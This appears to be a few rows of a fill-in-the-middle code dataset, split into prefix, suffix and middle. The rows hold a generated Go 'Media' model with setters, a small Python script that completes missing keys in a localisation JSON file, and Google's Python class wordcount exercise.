err := writer.WriteAdditionalData(m.GetAdditionalData())
if err != nil {
return err
}
}
return nil
}
// SetAdditionalData sets the AdditionalData property value. Stores additional data not described in the OpenAPI description found when deserializing. Can be used for serialization as well.
func (m *Media) SetAdditionalData(value map[string]interface{})() {
m.additionalData = value
}
// SetCalleeDevice sets the calleeDevice property value. Device information associated with the callee endpoint of this media.
func (m *Media) SetCalleeDevice(value *DeviceInfo)() {
m.calleeDevice = value
}
// SetCalleeNetwork sets the calleeNetwork property value. Network information associated with the callee endpoint of this media.
func (m *Media) SetCalleeNetwork(value *NetworkInfo)() {
m.calleeNetwork = value
}
// SetCallerDevice sets the callerDevice property value. Device information associated with the caller endpoint of this media.
func (m *Media) SetCallerDevice(value *DeviceInfo)() {
m.callerDevice = value
}
// SetCallerNetwork sets the callerNetwork property value. Network information associated with the caller endpoint of this media.
func (m *Media) SetCallerNetwork(value *NetworkInfo)() {
m.callerNetwork = value
}
// SetLabel sets the label property value. How the media was identified during media negotiation stage.
func (m *Media) SetLabel(value *string)() {
m.label = value
}
// SetStreams sets the streams property value. Network streams associated with this media.
func (m *Media) SetStreams(value []MediaStream)() {
m.streams = value
}
| {
m := &Media{
}
m.SetAdditionalData(make(map[string]interface{}));
return m
} |
test.py | import json
print('name : ', end = '')
b = input()
json_data = open('en-US.json', 'rt', encoding='utf-8').read()
a_json = json.loads(json_data)
json_data = open(str(b) + '.json', 'rt', encoding='utf-8').read()
b_json = json.loads(json_data)
for a_in in a_json:
if not a_in in b_json:
print(a_in + ' : ', end = '')
c = input()
b_json[a_in] = c | print(str(b_json).replace('", ', '",\n ').replace('{', '{\n ').replace('}', '\n}').replace('\'', '"')) | |
wordcount.py | #!/usr/bin/python -tt
# Copyright 2010 Google Inc.
# Licensed under the Apache License, Version 2.0
# http://www.apache.org/licenses/LICENSE-2.0
# Google's Python Class
# http://code.google.com/edu/languages/google-python-class/
"""Wordcount exercise
Google's Python class
The main() below is already defined and complete. It calls print_words()
and print_top() functions which you write.
1. For the --count flag, implement a print_words(filename) function that counts
how often each word appears in the text and prints:
word1 count1
word2 count2
...
Print the above list in order sorted by word (python will sort punctuation to
come before letters -- that's fine). Store all the words as lowercase,
so 'The' and 'the' count as the same word.
2. For the --topcount flag, implement a print_top(filename) which is similar
to print_words() but which prints just the top 20 most common words sorted
so the most common word is first, then the next most common, and so on.
Use str.split() (no arguments) to split on all whitespace.
Workflow: don't build the whole program at once. Get it to an intermediate
milestone and print your data structure and sys.exit(0).
When that's working, try for the next milestone.
Optional: define a helper function to avoid code duplication inside
print_words() and print_top().
"""
import sys
# +++your code here+++
# Define print_words(filename) and print_top(filename) functions.
# You could write a helper utility function that reads a file
# and builds and returns a word/count dict for it.
# Then print_words() and print_top() can just call the utility function.
###
# This basic command line argument parsing code is provided and
# calls the print_words() and print_top() functions which you must define.
def main():
if len(sys.argv) != 3:
print 'usage: ./wordcount.py {--count | --topcount} file'
option = sys.argv[1]
filename = sys.argv[2]
if option == '--count':
print_words(filename)
elif option == '--topcount':
print_top(filename)
else:
print 'unknown option: ' + option
print 'please provide "--count" or "--topcount"'
sys.exit(1)
def prepare_dictionary(filename):
f = open(filename, 'rU')
dict = {}
for line in f:
words = line.split(' ')
for raw_word in words:
lowercase_word = raw_word.lower()
word = lowercase_word.strip()
if (word.isalpha() != True): continue
if word in dict:
dict[word] += 1
else:
dict[word] = 1
f.close()
return dict
def print_words(filename):
dict = prepare_dictionary(filename)
for word in sorted(dict):
print word + ':' + str(dict[word])
def | (filename):
dict = prepare_dictionary(filename)
def MyFn(s):
return -dict[s]
count = 0
for word in sorted(dict, key = MyFn):
print word + ':' + str(dict[word])
count += 1
if count >= 20 :
break
if __name__ == '__main__':
main()
| print_top |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.